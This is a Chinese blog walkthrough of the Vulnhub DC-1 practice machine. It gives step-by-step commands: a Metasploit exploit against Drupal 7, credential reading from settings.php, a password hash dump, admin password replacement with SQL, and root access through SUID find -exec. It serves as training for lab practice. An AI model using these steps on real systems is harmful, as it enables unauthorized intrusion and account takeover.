Vulnhub靶机:DC-1渗透详细过程

已于 2024-04-10 13:53:43 修改
阅读量718 收藏 19
点赞数 20
文章标签: web安全 网络安全 linux
于 2024-04-01 12:04:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Timeless_cz/article/details/137210517
版权

靶机下载地址放在文章最后啦

一、靶机的搭建

1.打开文件夹右击使用VM虚拟机打开​​​​​​​​​​​​​​

2.给虚拟机取个名字(我这里就直接DC-1),选择自己虚拟机存放的位置

3.等待虚拟机的导入

4.虚拟机网络默认的桥接模式,直接开启虚拟机即可

5.靶场的登录界面(不知道密码和账号),IP也不知道是好多。

二、渗透过程

1.直接上nmap扫一下存活的IP地址

我这里IP地址有点多,13这台机子应该就是DC-2靶机IP了

nmap -sn 10.189.100.10-20

2.再用nmap扫一下开放的端口

nmap -sV -A -p- 10.189.100.13

​​​​​​​

3.发现只开放了 22ssh,80http和111,48121四个端口,先访问80端口看看

http://10.189.100.13

4.发现是drupal框架,我们使用whatweb看看网站的指纹信息

whatweb -v 10.189.100.13

5.发现是Drupal 7,这个版本有漏洞,直接使用msf

msfconsole

6.搜索Drupal 7相关漏洞脚本,发现有7个漏洞脚本,我们就挨着试看那个脚本可以使用

search drupal 7

7.先选择1号脚本试试

use 1

​​​​​​​​​​​options看一下需要设置的参数,这里只需要设置靶机IP地址

options

设置参数靶机IP地址

set rhosts 10.189.100.13

设置好后直接run,发现已经成功连接

run

8.现在我们使用shell,再看看我们的权限whoami一下,目前我们是www-data,后续我们需要提权。

shell
Whoami

9.pwd看看当前我们在那个路径(/var/www),并且ls一下看看有什么文件,我们发现了flag1.txt,直接使用cat打开。

pwd
ls
cat flag1.txt

10.我们找到了第一个flag1.txt,翻译一下flag1的意思,现在我们百度一下drupal CMS默认配置文件,在/sites/default/settings.php。

11.我们先打开配置文件查看一下,我们发现了flag2和mysql数据库的账号密码。我们翻译一下flag2的意思。

cat sites/default/settings.php

12.使用python先反弹一下shell

python -c 'import pty;pty.spawn("/bin/bash")'

13.现在连接一下mysql数据库

mysql -udbuser -p

14.看一下有哪些数据库

show databases;

​​​​​​​

15.我们直接选择drupaldb数据库,并查看有哪些表

use drupaldb;
show tables;

16.我们找到了users表,并在里面找到了两个用户名和密码,但是密码是加密了的,无法直接使用

select * from users
admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR 
Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg

17.我们百度了一下Drupal7的加密方式,发现不可逆的,我们只能通过其他方式生成加密后的密码。

18.退出mysql在网站目录找找有没有关于password有关的文件,我们找到一个密码HASH有关的脚本,先打开看看是什么内容,发现就Drupal加密脚本

exit
find / -name password
cat /var/www/scripts/password-hash.sh

19.我们使用脚本把我们自己的密码加密一下并重新连接数据库(重复13-15步骤)

scripts/password-hash.sh 123456

hash: $S$DlKqThUfFRfM7b8ykCRAy50xSs0vwy39a4jes0n6cbCrL9hmIdh7

20.我们使用SQL语句来替换一下数据库中的密码

update users set pass = "$S$DlKqThUfFRfM7b8ykCRAy50xSs0vwy39a4jes0n6cbCrL9hmIdh7" where name = 'admin' or name = 'Fred';

21.使用我们修改过后的密码登陆​​​​​​​,成功登陆进去

22.在左上角Dashboard里面发现了flag3

23.翻译一下flag3说的什么,看到这里我们需要使用SUID提权,并且在passwd里面查找下一个flag4(passwd在/etc目录下)

24.返回我们的shell进行SUID提权,提权成功,我们现在是root权限了

find / -user root -perm -u=s -type f 2>/dev/null
find /etc/passwd -exec Whoami \;      
#/etc/passwd可以替换,只要是root权限的都可以
#whaoami是我们需要执行的命令,每执行一个命令只需要替换whoami即可,不能直接执行命令

26.我们进入etc目录打开passwd文件,发现flag4在/home目录下

cat /etc/passwd

27.切换到/home/flag4目录下面找到flag4.txt并打开,顺便翻译一下

cd /home/flag4
find /etc/passwd -exec cat flag4.txt \;

28.我们现在是root权限可以进入root目录去查看一下,成功找到最后一个flag并打开它

find /etc/passwd -exec ls /root \;
find /etc/passwd -exec cat /root/thefinalflag.txt \;

​​​​​​​

记得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我

后台回复"DC-1"即可获得靶场地址

有考取NISP一级/二级/三级、CISP-PTE/PTS等证书的可以加我好友私信我(公众号回复“加好友”)。

菜鸟学渗透
关注
  • 20
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Vulnhub靶机:DC-2渗透详细过程
IerkeU的博客
01-30 3597
前言 这次练习的靶机vulnhub平台下的DC系列靶机第二台,下载地址为DC: 2 ~ VulnHub。该靶机的难度系数为简单,和DC1一样,总共有五个flag。 DC-2与DC-1一样,是一个适合初学者的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具)
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
vulnhub靶场实战系列-DC-1实战
最新发布
weixin_45221204的博客
05-17 1091
DC-1靶场中,使用了metaspolit的基础操作,获取到了CMS的关键配置文件,然后对靶机数据库中admin用户的passwd进行修改,在网站后台获取到了关键信息,最后进行了find提权,并获得所有的flag
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub实战篇四:DC1靶机渗透记录
a1004070060的博客
04-16 1097
前言:DC-1是vulnhub系列靶机中比较有名的一台入门级靶机渗透姿势有很多种,适合初学者。本次渗透测试也是笔者自入坑vlunhub以来第一次完全独立拿下一台靶机,于是来把我的专属经验分享给大家。 0x00环境描述 靶机名称:DC-1 下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 攻击机ip:172.16.12.137 靶机i...
VulnHub系列(一)DC-1
2022年7月6日从博客园https://www.cnblogs.com/hugboy/ 学习记录博客。
05-08 3337
环境 kali linuxDC-1 都是搭建在VMware上的虚拟机,都是NAT模式。 主机发现 NAT模式下虚拟机没有被分配真实的ip地址,他们通过共享宿主机的ip地址访问互联网。我们可以通过它的MAC地址00:0C:29:23:E2:8D查到宿主机分配给他的虚拟ip。 arp-scan -l=>192.168.62.134 还有另一种方法,假设我们已经和目标在同一个局域网下:...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 7984
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
vulnhub练习 DC-1复现及分析
黑战士的博客
02-20 988
1.扫描局域网主机netdiscover用法2.开放端口扫描2.MSF使用3.hydra爆破:sudo hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.0.100hydra+John密码包以上两种方式可以爆出flag4的密码4.suid提权:Linux下用SUID提权、find命令exec。
Vulnhub靶机渗透测试——DC-1
Cobra的博客
04-12 2512
Vulnhub靶机渗透测试实战——DC-1 一、实验环境 攻击机(kali): 192.168.189.148 靶机(ubuntu): 192.168.189.172] 二、信息收集 1、使用nmap扫描进行主机发现 nmap 192.168.189.0/24 2、发现IP为192.168.189.172主机开放80和22等端口,访问其80端口 三、漏洞利用 1、发现该站点是由Drupal搭建,利用msf进行漏洞利用 use exploit/unix/webapp/drupal_drupalgedd
Vulnhub靶机渗透学习——DC-1
qq_45612828的博客
10-13 148
Metasploit的EXP使用drupal 7的漏洞通过配置文件获取数据库账号数据库更新密码SUID 提权——find。
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
VulnHub DC-1
weixin_45682839的博客
04-13 325
VnlnHub DC-1靶场攻关攻略记录,五个flag,获得root权限。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2497
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
vulnhub靶场实战:DC-1
huangyongkang666的博客
04-18 4467
vulnhub实战:DC-1 1.DC-1介绍 DC-1是一个专门构建的易受攻击的实验室,目的是在渗透测试领域获得经验。 它旨在为初学者带来挑战,但它的容易程度将取决于您的技能和知识以及您的学习能力。 要成功完成此挑战,您将需要Linux技能,熟悉Linux命令行以及具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。 有多种方法可以获得root,但是,我包含了一些包含初学者线索的标志。 总共有五个flag,但最终目标是在root的主目录中找到并读取
VulnHub入门教程:DC-1靶场攻破指南
在进行渗透测试的过程中,DC-1 靶场提供了一个安全的学习环境,允许初学者在不造成实际损害的情况下实践和提升技能。这个靶场设计为对初学者具有挑战性,但难度程度将取决于你的技能、知识和学习能力。为了成功完成...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值